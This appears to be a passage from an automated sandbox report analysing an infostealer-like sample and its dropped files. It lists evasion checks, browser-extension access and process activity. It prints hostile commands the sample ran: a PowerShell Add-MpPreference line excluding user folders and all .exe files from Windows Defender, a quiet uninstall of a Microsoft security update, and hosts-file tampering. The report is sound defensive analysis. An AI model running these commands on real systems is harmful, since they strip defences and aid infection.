Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-104861

Query firmware table information (likely to detect VMs)

Source: C:\ProgramData\HIIDGCGCBF.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\ProgramData\HIIDGCGCBF.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\ProgramData\Google\Chrome\updater.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\Google\Chrome\updater.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\Google\Chrome\updater.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3401			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6403			Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Dropped PE file which has not been started: C:\ProgramData\chrome.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep count: 3401 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep count: 6403 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00418060 GetSystemInfo,wsprintfA,

0_2_00418060

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: HIIDGCGCBF.exe, 00000004.00000002.1985668044.00000199B30FC000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000002A.00000002.2010174806.0000029CD506C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104846
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104849
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104889
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-106024
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104860
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104868
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104867
Source: C:\Users\user\Desktop\b4s45TboUL.exe	API call chain: ExitProcess graph end node	graph_0-104688

Source: C:\ProgramData\HIIDGCGCBF.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\ProgramData\HIIDGCGCBF.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\Google\Chrome\updater.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\ProgramData\HIIDGCGCBF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	Process queried: DebugPort
Source: C:\ProgramData\Google\Chrome\updater.exe	Process queried: DebugPort
Source: C:\ProgramData\Google\Chrome\updater.exe	Process queried: DebugObjectHandle

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041B058

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]

0_2_00419AA0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041B058
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0041D21A SetUnhandledExceptionFilter,	0_2_0041D21A
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B63A
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFF6ACC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CFF6ACC
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFF1726 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CFF1726
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFF11FD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CFF11FD
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_61EAF900

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\ProgramData\HIIDGCGCBF.exe	NtQueryInformationProcess: Indirect: 0x7FF68D79249A	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	NtSetInformationThread: Indirect: 0x7FF68D76C6C7	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	NtQuerySystemInformation: Indirect: 0x7FF68D7339DA	Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	NtQueryInformationProcess: Indirect: 0x7FF7588EF327
Source: C:\ProgramData\Google\Chrome\updater.exe	NtSetInformationThread: Indirect: 0x7FF7588DC6C7
Source: C:\ProgramData\Google\Chrome\updater.exe	NtQueryInformationProcess: Indirect: 0x7FF75890249A
Source: C:\ProgramData\Google\Chrome\updater.exe	NtQuerySystemInformation: Indirect: 0x7FF7588A39DA
Source: C:\ProgramData\HIIDGCGCBF.exe	NtQueryInformationProcess: Indirect: 0x7FF68D77F327	Jump to behavior

Modifies the hosts file

Source: C:\ProgramData\HIIDGCGCBF.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_004198E0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00419790

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_6CFBB5E0 cpuid

0_2_6CFBB5E0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417D20

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
